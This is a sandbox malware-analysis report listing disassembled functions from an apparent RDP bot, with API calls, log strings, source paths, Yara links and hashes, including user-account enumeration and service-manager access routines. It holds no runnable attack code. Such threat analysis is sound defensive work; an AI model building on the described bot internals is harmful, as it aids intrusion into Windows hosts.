Function 00007FFE0EB4F401 Relevance: 28.1, APIs: 4, Strings: 12, Instructions: 137threadCOMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00007FFE0EB4F41C
CreateThread.KERNEL32 ref: 00007FFE0EB4F45C
GetLastError.KERNEL32 ref: 00007FFE0EB4F4A4
GetLastError.KERNEL32 ref: 00007FFE0EB4F57C

Part of subcall function 00007FFE0EB41292: fwrite.MSVCRT ref: 00007FFE0EB4133E
Part of subcall function 00007FFE0EB41292: fflush.MSVCRT ref: 00007FFE0EB4134A

Strings

[E] (%s) -> CreateThread(routine_rx) failed(gle=%lu), xrefs: 00007FFE0EB4F58E
[E] (%s) -> Failed(err=%08x), xrefs: 00007FFE0EB4F490
P, xrefs: 00007FFE0EB4F5C7
[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_subscribers) failed(gle=%lu), xrefs: 00007FFE0EB4F4B6
[I] (%s) -> %s, xrefs: 00007FFE0EB4F683
~, xrefs: 00007FFE0EB4F5C2
, xrefs: 00007FFE0EB4F59A
Done, xrefs: 00007FFE0EB4F675
ebus_init, xrefs: 00007FFE0EB4F489, 00007FFE0EB4F4AF, 00007FFE0EB4F587, 00007FFE0EB4F67C
P, xrefs: 00007FFE0EB4F52B
, xrefs: 00007FFE0EB4F4C2
~, xrefs: 00007FFE0EB4F522

Memory Dump Source

Source File: 00000015.00000002.2484609499.00007FFE0EB41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0EB40000, based on PE: true

Associated: 00000015.00000002.2484591156.00007FFE0EB40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000015.00000002.2484635439.00007FFE0EB56000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000015.00000002.2484666608.00007FFE0EB60000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000015.00000002.2484687240.00007FFE0EB63000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000015.00000002.2484704200.00007FFE0EB64000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe0eb40000_main.jbxd

Similarity

API ID: ErrorLast$CountCreateCriticalInitializeSectionSpinThreadfflushfwrite
String ID: $ $Done$P$P$[E] (%s) -> CreateThread(routine_rx) failed(gle=%lu)$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_subscribers) failed(gle=%lu)$[I] (%s) -> %s$ebus_init$~$~
API String ID: 1412730629-3633878399
Opcode ID: 3d1ab3aa8f4161a05aa8dfdd1c0cce3f996ef00871ce4195b1a1b84c650aac4e
Instruction ID: b13b76025f1c92d6c42aac831637d9bcd072b238c26446a8178e8eeab5ea1d2a
Opcode Fuzzy Hash: 3d1ab3aa8f4161a05aa8dfdd1c0cce3f996ef00871ce4195b1a1b84c650aac4e
Instruction Fuzzy Hash: 5B5124A1B0C70782FB309F54A8843792290EF14375F242336CAEE472F5DE6DA8859E52

Function 00007FFE0E161D21 Relevance: 28.1, APIs: 4, Strings: 12, Instructions: 137threadCOMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00007FFE0E161D3C
CreateThread.KERNEL32 ref: 00007FFE0E161D7C
GetLastError.KERNEL32 ref: 00007FFE0E161DC4
GetLastError.KERNEL32 ref: 00007FFE0E161E9C

Part of subcall function 00007FFE0E161292: fwrite.MSVCRT ref: 00007FFE0E16133E
Part of subcall function 00007FFE0E161292: fflush.MSVCRT ref: 00007FFE0E16134A

Strings

ebus_init, xrefs: 00007FFE0E161DA9, 00007FFE0E161DCF, 00007FFE0E161EA7, 00007FFE0E161F9C
Done, xrefs: 00007FFE0E161F95
[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_subscribers) failed(gle=%lu), xrefs: 00007FFE0E161DD6
[E] (%s) -> Failed(err=%08x), xrefs: 00007FFE0E161DB0
, xrefs: 00007FFE0E161EBA
P, xrefs: 00007FFE0E161E4B
[I] (%s) -> %s, xrefs: 00007FFE0E161FA3
~, xrefs: 00007FFE0E161E42
[E] (%s) -> CreateThread(routine_rx) failed(gle=%lu), xrefs: 00007FFE0E161EAE
, xrefs: 00007FFE0E161DE2
P, xrefs: 00007FFE0E161EE7
~, xrefs: 00007FFE0E161EE2

Memory Dump Source

Source File: 00000015.00000002.2484499625.00007FFE0E161000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE0E160000, based on PE: true

Associated: 00000015.00000002.2484478122.00007FFE0E160000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484520770.00007FFE0E174000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484539782.00007FFE0E17D000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484557065.00007FFE0E180000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484573253.00007FFE0E181000.00000008.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe0e160000_main.jbxd

Similarity

API ID: ErrorLast$CountCreateCriticalInitializeSectionSpinThreadfflushfwrite
String ID: $ $Done$P$P$[E] (%s) -> CreateThread(routine_rx) failed(gle=%lu)$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_subscribers) failed(gle=%lu)$[I] (%s) -> %s$ebus_init$~$~
API String ID: 1412730629-3633878399
Opcode ID: 281e6b280061e0635a5243834af1028dd6d232271e6f00ea43ae733916f1591a
Instruction ID: a6be6d44f69f868ddb7340421f4c4fd992c299d07847dbc7cb40b45825094bf5
Opcode Fuzzy Hash: 281e6b280061e0635a5243834af1028dd6d232271e6f00ea43ae733916f1591a
Instruction Fuzzy Hash: 49512860F0E743A2FB305B14A4843B82663AF05765F240B37D5FE462F2DF6DA9899342

Function 00007FFE11EC3B21 Relevance: 28.1, APIs: 4, Strings: 12, Instructions: 137threadCOMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00007FFE11EC3B3C
CreateThread.KERNEL32 ref: 00007FFE11EC3B7C
GetLastError.KERNEL32 ref: 00007FFE11EC3BC4
GetLastError.KERNEL32 ref: 00007FFE11EC3C9C

Part of subcall function 00007FFE11EC2FD2: fwrite.MSVCRT ref: 00007FFE11EC307E
Part of subcall function 00007FFE11EC2FD2: fflush.MSVCRT ref: 00007FFE11EC308A

Strings

P, xrefs: 00007FFE11EC3CE7
Done, xrefs: 00007FFE11EC3D95
[E] (%s) -> CreateThread(routine_rx) failed(gle=%lu), xrefs: 00007FFE11EC3CAE
[E] (%s) -> Failed(err=%08x), xrefs: 00007FFE11EC3BB0
, xrefs: 00007FFE11EC3CBA
[I] (%s) -> %s, xrefs: 00007FFE11EC3DA3
~, xrefs: 00007FFE11EC3CE2
ebus_init, xrefs: 00007FFE11EC3BA9, 00007FFE11EC3BCF, 00007FFE11EC3CA7, 00007FFE11EC3D9C
~, xrefs: 00007FFE11EC3C42
, xrefs: 00007FFE11EC3BE2
P, xrefs: 00007FFE11EC3C4B
[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_subscribers) failed(gle=%lu), xrefs: 00007FFE11EC3BD6

Memory Dump Source

Source File: 00000015.00000002.2484854998.00007FFE11EC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE11EC0000, based on PE: true

Associated: 00000015.00000002.2484834641.00007FFE11EC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.2484885042.00007FFE11ED2000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.2484904334.00007FFE11EDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.2484920861.00007FFE11EDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.2484937141.00007FFE11EDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.2484954358.00007FFE11EE2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe11ec0000_main.jbxd

Similarity

API ID: ErrorLast$CountCreateCriticalInitializeSectionSpinThreadfflushfwrite
String ID: $ $Done$P$P$[E] (%s) -> CreateThread(routine_rx) failed(gle=%lu)$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_subscribers) failed(gle=%lu)$[I] (%s) -> %s$ebus_init$~$~
API String ID: 1412730629-3633878399
Opcode ID: b1516949392ace607f764f33e21896c41fbae2f7928558f7730e3b32c198888b
Instruction ID: 0bdd7213c04c2e366bc2c6ecec3166beb4ce1e9f6dbce65780c48a8babfacf06
Opcode Fuzzy Hash: b1516949392ace607f764f33e21896c41fbae2f7928558f7730e3b32c198888b
Instruction Fuzzy Hash: 7C513860A0CF4382FB7057D6ECC83BA26699F05375FA017B2C56E462F1DE6DBE858241

Function 00007FF76A906242 Relevance: 27.2, APIs: 7, Strings: 11, Instructions: 241memorystringCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF76A9184F0,00000000,00000000), ref: 00007FF76A90628D
HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF76A9184F0,00000000,00000000), ref: 00007FF76A90629E

Part of subcall function 00007FF76A902515: fopen.MSVCRT ref: 00007FF76A90255A
Part of subcall function 00007FF76A902515: fseek.MSVCRT ref: 00007FF76A902579
Part of subcall function 00007FF76A902515: _errno.MSVCRT ref: 00007FF76A90258D
Part of subcall function 00007FF76A902515: _errno.MSVCRT ref: 00007FF76A9025A8

GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF76A9184F0,00000000,00000000), ref: 00007FF76A9063CA
HeapAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF76A9184F0,00000000,00000000), ref: 00007FF76A9063DB
strncpy.MSVCRT ref: 00007FF76A90651C
strncpy.MSVCRT ref: 00007FF76A906533
strncpy.MSVCRT ref: 00007FF76A906592

Part of subcall function 00007FF76A9099E2: fwrite.MSVCRT ref: 00007FF76A909A8E
Part of subcall function 00007FF76A9099E2: fflush.MSVCRT ref: 00007FF76A909A9A

Strings

5, xrefs: 00007FF76A9062F5
service, xrefs: 00007FF76A90624D
mem_alloc, xrefs: 00007FF76A906423
H:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FF76A9062FD
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF76A906312
(path != NULL), xrefs: 00007FF76A906304
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF76A9062D6
[I] (%s) -> Done(path=%s), xrefs: 00007FF76A9065F8
NULL, xrefs: 00007FF76A9065E2
ini_load, xrefs: 00007FF76A9062CF, 00007FF76A90630B, 00007FF76A9065F1
[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FF76A90642A

Memory Dump Source

Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true

Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd

Similarity

API ID: Heap$strncpy$Process_errno$AllocFreefflushfopenfseekfwrite
String ID: (path != NULL)$5$H:/Projects/rdp/bot/codebase/ini.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(path=%s)$ini_load$mem_alloc$service
API String ID: 1423203057-595982613
Opcode ID: 35eb32acd43654b99719608bc2c1593f5e5cb6d4644c090a06c464b2fce54b4c
Instruction ID: a59fc90ec702b97cb650e279421f96dc2e176d9b13ebc10ab119f372bbb4e35b
Opcode Fuzzy Hash: 35eb32acd43654b99719608bc2c1593f5e5cb6d4644c090a06c464b2fce54b4c
Instruction Fuzzy Hash: 1DA1B462A0D782C5FA21AB05A440379EB61EF51BC4FE440B9DA4DC7695EFBCE585C320

Function 00007FF76A905602 Relevance: 26.5, APIs: 3, Strings: 12, Instructions: 246registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32 ref: 00007FF76A90565C
RegQueryValueExA.KERNEL32 ref: 00007FF76A9057A4

Part of subcall function 00007FF76A9099E2: fwrite.MSVCRT ref: 00007FF76A909A8E
Part of subcall function 00007FF76A9099E2: fflush.MSVCRT ref: 00007FF76A909A9A

Strings

[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FF76A90591D
registry_get_value, xrefs: 00007FF76A905677, 00007FF76A9056D0, 00007FF76A905703, 00007FF76A905736, 00007FF76A905769, 00007FF76A9057CB, 00007FF76A905916, 00007FF76A905A94
(key != NULL), xrefs: 00007FF76A9056FC
NULL, xrefs: 00007FF76A9057FE, 00007FF76A905AAC, 00007FF76A905AB8
[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu), xrefs: 00007FF76A90567E
[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu), xrefs: 00007FF76A9057D2
(value_sz != NULL), xrefs: 00007FF76A905762
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF76A9056D7, 00007FF76A90570A, 00007FF76A90573D, 00007FF76A905770
[D] (%s) -> Done(root=0x%p,key=%s,param=%s), xrefs: 00007FF76A905A9B
H:/Projects/rdp/bot/codebase/registry.c, xrefs: 00007FF76A9056C2, 00007FF76A9056F5, 00007FF76A905728, 00007FF76A90575B
(root != NULL), xrefs: 00007FF76A9056C9
(value != NULL), xrefs: 00007FF76A90572F

Memory Dump Source

Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true

Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd

Similarity

API ID: OpenQueryValuefflushfwrite
String ID: (key != NULL)$(root != NULL)$(value != NULL)$(value_sz != NULL)$H:/Projects/rdp/bot/codebase/registry.c$NULL$[D] (%s) -> Done(root=0x%p,key=%s,param=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu)$registry_get_value
API String ID: 1980715187-2022313065
Opcode ID: 7fcae333c55fb0ccb99e8ffe0183cfd2a21e9584ea582d874418c060f7b8e282
Instruction ID: 1299f517e3ac1093dfda70ad05214c915db98c6a2da67739a8fdf1d5a8e68924
Opcode Fuzzy Hash: 7fcae333c55fb0ccb99e8ffe0183cfd2a21e9584ea582d874418c060f7b8e282
Instruction Fuzzy Hash: BDA15120D0C70BD6F621B740A84077AE254AF017C4FF481BADD1ECA691EEADAD85D732

Function 00007FFE0E163C65 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 102memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32 ref: 00007FFE0E1638F8
wcsncpy.MSVCRT ref: 00007FFE0E163926
LookupAccountNameW.ADVAPI32 ref: 00007FFE0E163983
GetLastError.KERNEL32 ref: 00007FFE0E163995
wcslen.MSVCRT ref: 00007FFE0E163D0B
GetProcessHeap.KERNEL32 ref: 00007FFE0E163D1B
HeapAlloc.KERNEL32 ref: 00007FFE0E163D2C
GetProcessHeap.KERNEL32 ref: 00007FFE0E163D48
HeapAlloc.KERNEL32 ref: 00007FFE0E163D59
NetApiBufferFree.NETAPI32 ref: 00007FFE0E163D97
NetUserEnum.NETAPI32 ref: 00007FFE0E163E0D
GetProcessHeap.KERNEL32 ref: 00007FFE0E163E4B
HeapAlloc.KERNEL32 ref: 00007FFE0E163E5C
memcpy.MSVCRT ref: 00007FFE0E163E99
GetProcessHeap.KERNEL32 ref: 00007FFE0E163E9E
HeapFree.KERNEL32 ref: 00007FFE0E163EAF

Strings

users_sync, xrefs: 00007FFE0E1639A0
[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FFE0E163D76
mem_alloc, xrefs: 00007FFE0E163D6F
D, xrefs: 00007FFE0E163915
[E] (%s) -> LookupAccountNameW failed(gle=%lu), xrefs: 00007FFE0E1639A7

Memory Dump Source

Source File: 00000015.00000002.2484499625.00007FFE0E161000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE0E160000, based on PE: true

Associated: 00000015.00000002.2484478122.00007FFE0E160000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484520770.00007FFE0E174000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484539782.00007FFE0E17D000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484557065.00007FFE0E180000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484573253.00007FFE0E181000.00000008.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe0e160000_main.jbxd

Similarity

API ID: Heap$AllocProcess$Free$AccountBufferEnumErrorLastLocalLookupNameUsermemcpywcslenwcsncpy
String ID: D$[E] (%s) -> LookupAccountNameW failed(gle=%lu)$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$users_sync
API String ID: 2122475568-588975189
Opcode ID: 9d059f1f5dd7415c002bfc40bca07d3c4d82ce6738f01354cf924633f6badd35
Instruction ID: bd35fc5699bf01aebff2e05e333e1ada86f5d2a7daa10b81e3bdcda18423152c
Opcode Fuzzy Hash: 9d059f1f5dd7415c002bfc40bca07d3c4d82ce6738f01354cf924633f6badd35
Instruction Fuzzy Hash: 65513AB6A08A4686EB50CF29E44436977A1FB88B88F504137DADE43769DF3CE949C740

Function 00007FFE0E163C6C Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 102memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32 ref: 00007FFE0E1638F8
wcsncpy.MSVCRT ref: 00007FFE0E163926
LookupAccountNameW.ADVAPI32 ref: 00007FFE0E163983
GetLastError.KERNEL32 ref: 00007FFE0E163995
wcslen.MSVCRT ref: 00007FFE0E163D0B
GetProcessHeap.KERNEL32 ref: 00007FFE0E163D1B
HeapAlloc.KERNEL32 ref: 00007FFE0E163D2C
GetProcessHeap.KERNEL32 ref: 00007FFE0E163D48
HeapAlloc.KERNEL32 ref: 00007FFE0E163D59
NetApiBufferFree.NETAPI32 ref: 00007FFE0E163D97
NetUserEnum.NETAPI32 ref: 00007FFE0E163E0D
GetProcessHeap.KERNEL32 ref: 00007FFE0E163E4B
HeapAlloc.KERNEL32 ref: 00007FFE0E163E5C
memcpy.MSVCRT ref: 00007FFE0E163E99
GetProcessHeap.KERNEL32 ref: 00007FFE0E163E9E
HeapFree.KERNEL32 ref: 00007FFE0E163EAF

Strings

users_sync, xrefs: 00007FFE0E1639A0
[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FFE0E163D76
mem_alloc, xrefs: 00007FFE0E163D6F
D, xrefs: 00007FFE0E163915
[E] (%s) -> LookupAccountNameW failed(gle=%lu), xrefs: 00007FFE0E1639A7

Memory Dump Source

Source File: 00000015.00000002.2484499625.00007FFE0E161000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE0E160000, based on PE: true

Associated: 00000015.00000002.2484478122.00007FFE0E160000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484520770.00007FFE0E174000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484539782.00007FFE0E17D000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484557065.00007FFE0E180000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484573253.00007FFE0E181000.00000008.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe0e160000_main.jbxd

Similarity

API ID: Heap$AllocProcess$Free$AccountBufferEnumErrorLastLocalLookupNameUsermemcpywcslenwcsncpy
String ID: D$[E] (%s) -> LookupAccountNameW failed(gle=%lu)$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$users_sync
API String ID: 2122475568-588975189
Opcode ID: 1eedadad500edf32e04d263bd9f55e9cc564723da34f8de4d54f81d13fbb1ac2
Instruction ID: 6c88bdfdf5b02dce101cf4c0776355e528af4b8f3ef55cb3f77c4fa0a1c99956
Opcode Fuzzy Hash: 1eedadad500edf32e04d263bd9f55e9cc564723da34f8de4d54f81d13fbb1ac2
Instruction Fuzzy Hash: F2513BB6A08B4686EB50CF29E44436977A1FB88B84F504137DADD43769DF3CE949C740

Function 00007FFE0E163C73 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 102memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32 ref: 00007FFE0E1638F8
wcsncpy.MSVCRT ref: 00007FFE0E163926
LookupAccountNameW.ADVAPI32 ref: 00007FFE0E163983
GetLastError.KERNEL32 ref: 00007FFE0E163995
wcslen.MSVCRT ref: 00007FFE0E163D0B
GetProcessHeap.KERNEL32 ref: 00007FFE0E163D1B
HeapAlloc.KERNEL32 ref: 00007FFE0E163D2C
GetProcessHeap.KERNEL32 ref: 00007FFE0E163D48
HeapAlloc.KERNEL32 ref: 00007FFE0E163D59
NetApiBufferFree.NETAPI32 ref: 00007FFE0E163D97
NetUserEnum.NETAPI32 ref: 00007FFE0E163E0D
GetProcessHeap.KERNEL32 ref: 00007FFE0E163E4B
HeapAlloc.KERNEL32 ref: 00007FFE0E163E5C
memcpy.MSVCRT ref: 00007FFE0E163E99
GetProcessHeap.KERNEL32 ref: 00007FFE0E163E9E
HeapFree.KERNEL32 ref: 00007FFE0E163EAF

Strings

users_sync, xrefs: 00007FFE0E1639A0
[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FFE0E163D76
mem_alloc, xrefs: 00007FFE0E163D6F
D, xrefs: 00007FFE0E163915
[E] (%s) -> LookupAccountNameW failed(gle=%lu), xrefs: 00007FFE0E1639A7

Memory Dump Source

Source File: 00000015.00000002.2484499625.00007FFE0E161000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE0E160000, based on PE: true

Associated: 00000015.00000002.2484478122.00007FFE0E160000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484520770.00007FFE0E174000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484539782.00007FFE0E17D000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484557065.00007FFE0E180000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484573253.00007FFE0E181000.00000008.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe0e160000_main.jbxd

Similarity

API ID: Heap$AllocProcess$Free$AccountBufferEnumErrorLastLocalLookupNameUsermemcpywcslenwcsncpy
String ID: D$[E] (%s) -> LookupAccountNameW failed(gle=%lu)$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$users_sync
API String ID: 2122475568-588975189
Opcode ID: dcc62bcad00684de019104841a8f931329f32da96cad2cceaff96aeb97c58103
Instruction ID: b7a7b5279b0cc6e4a0512f896bf786eb8abf507c7f25631b013896d5e4daffaa
Opcode Fuzzy Hash: dcc62bcad00684de019104841a8f931329f32da96cad2cceaff96aeb97c58103
Instruction Fuzzy Hash: 05513BB6A08A4686EB50CF29E44436977A1FB88B84F504137DADD43769DF3CE949C740

Function 00007FFE0E163C88 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 102memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32 ref: 00007FFE0E1638F8
wcsncpy.MSVCRT ref: 00007FFE0E163926
LookupAccountNameW.ADVAPI32 ref: 00007FFE0E163983
GetLastError.KERNEL32 ref: 00007FFE0E163995
wcslen.MSVCRT ref: 00007FFE0E163D0B
GetProcessHeap.KERNEL32 ref: 00007FFE0E163D1B
HeapAlloc.KERNEL32 ref: 00007FFE0E163D2C
GetProcessHeap.KERNEL32 ref: 00007FFE0E163D48
HeapAlloc.KERNEL32 ref: 00007FFE0E163D59
NetApiBufferFree.NETAPI32 ref: 00007FFE0E163D97
NetUserEnum.NETAPI32 ref: 00007FFE0E163E0D
GetProcessHeap.KERNEL32 ref: 00007FFE0E163E4B
HeapAlloc.KERNEL32 ref: 00007FFE0E163E5C
memcpy.MSVCRT ref: 00007FFE0E163E99
GetProcessHeap.KERNEL32 ref: 00007FFE0E163E9E
HeapFree.KERNEL32 ref: 00007FFE0E163EAF

Strings

users_sync, xrefs: 00007FFE0E1639A0
[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FFE0E163D76
mem_alloc, xrefs: 00007FFE0E163D6F
D, xrefs: 00007FFE0E163915
[E] (%s) -> LookupAccountNameW failed(gle=%lu), xrefs: 00007FFE0E1639A7

Memory Dump Source

Source File: 00000015.00000002.2484499625.00007FFE0E161000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE0E160000, based on PE: true

Associated: 00000015.00000002.2484478122.00007FFE0E160000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484520770.00007FFE0E174000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484539782.00007FFE0E17D000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484557065.00007FFE0E180000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484573253.00007FFE0E181000.00000008.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe0e160000_main.jbxd

Similarity

API ID: Heap$AllocProcess$Free$AccountBufferEnumErrorLastLocalLookupNameUsermemcpywcslenwcsncpy
String ID: D$[E] (%s) -> LookupAccountNameW failed(gle=%lu)$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$users_sync
API String ID: 2122475568-588975189
Opcode ID: c284144d680ec4523087ec0b6fb13f06a2fc4852147986030773929b24b80cc0
Instruction ID: 78228c381e1b49e26cec74d7172dc70ef9668cb83fc3ac541a6a45e76ca4a212
Opcode Fuzzy Hash: c284144d680ec4523087ec0b6fb13f06a2fc4852147986030773929b24b80cc0
Instruction Fuzzy Hash: 74513AB6A08B4686EB50CF29E44436977A1FB88B88F504137DADE43769DF3CE949C740

Function 00007FFE0EB449BF Relevance: 24.6, APIs: 4, Strings: 10, Instructions: 94COMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00007FFE0EB449D0
OpenSCManagerA.ADVAPI32 ref: 00007FFE0EB449FA
GetLastError.KERNEL32 ref: 00007FFE0EB44A42
GetLastError.KERNEL32 ref: 00007FFE0EB44B1A

Part of subcall function 00007FFE0EB41292: fwrite.MSVCRT ref: 00007FFE0EB4133E
Part of subcall function 00007FFE0EB41292: fflush.MSVCRT ref: 00007FFE0EB4134A

Strings

, xrefs: 00007FFE0EB44A60
~, xrefs: 00007FFE0EB44AC0
[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_scm) failed(gle=%lu), xrefs: 00007FFE0EB44A54
[E] (%s) -> OpenSCManagerA(SERVICES_ACTIVE_DATABASE) failed(gle=%lu), xrefs: 00007FFE0EB44B2A
P, xrefs: 00007FFE0EB44AC9
[I] (%s) -> %s, xrefs: 00007FFE0EB44B58
ServicesActive, xrefs: 00007FFE0EB449EE
Done, xrefs: 00007FFE0EB44B4A
scm_init, xrefs: 00007FFE0EB44A27, 00007FFE0EB44A4D, 00007FFE0EB44B23, 00007FFE0EB44B51
[E] (%s) -> Failed(err=%08x), xrefs: 00007FFE0EB44A2E

Memory Dump Source

Source File: 00000015.00000002.2484609499.00007FFE0EB41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0EB40000, based on PE: true

Associated: 00000015.00000002.2484591156.00007FFE0EB40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000015.00000002.2484635439.00007FFE0EB56000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000015.00000002.2484666608.00007FFE0EB60000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000015.00000002.2484687240.00007FFE0EB63000.00000004.00000001.01000000.0000000E.sdmpDownload File
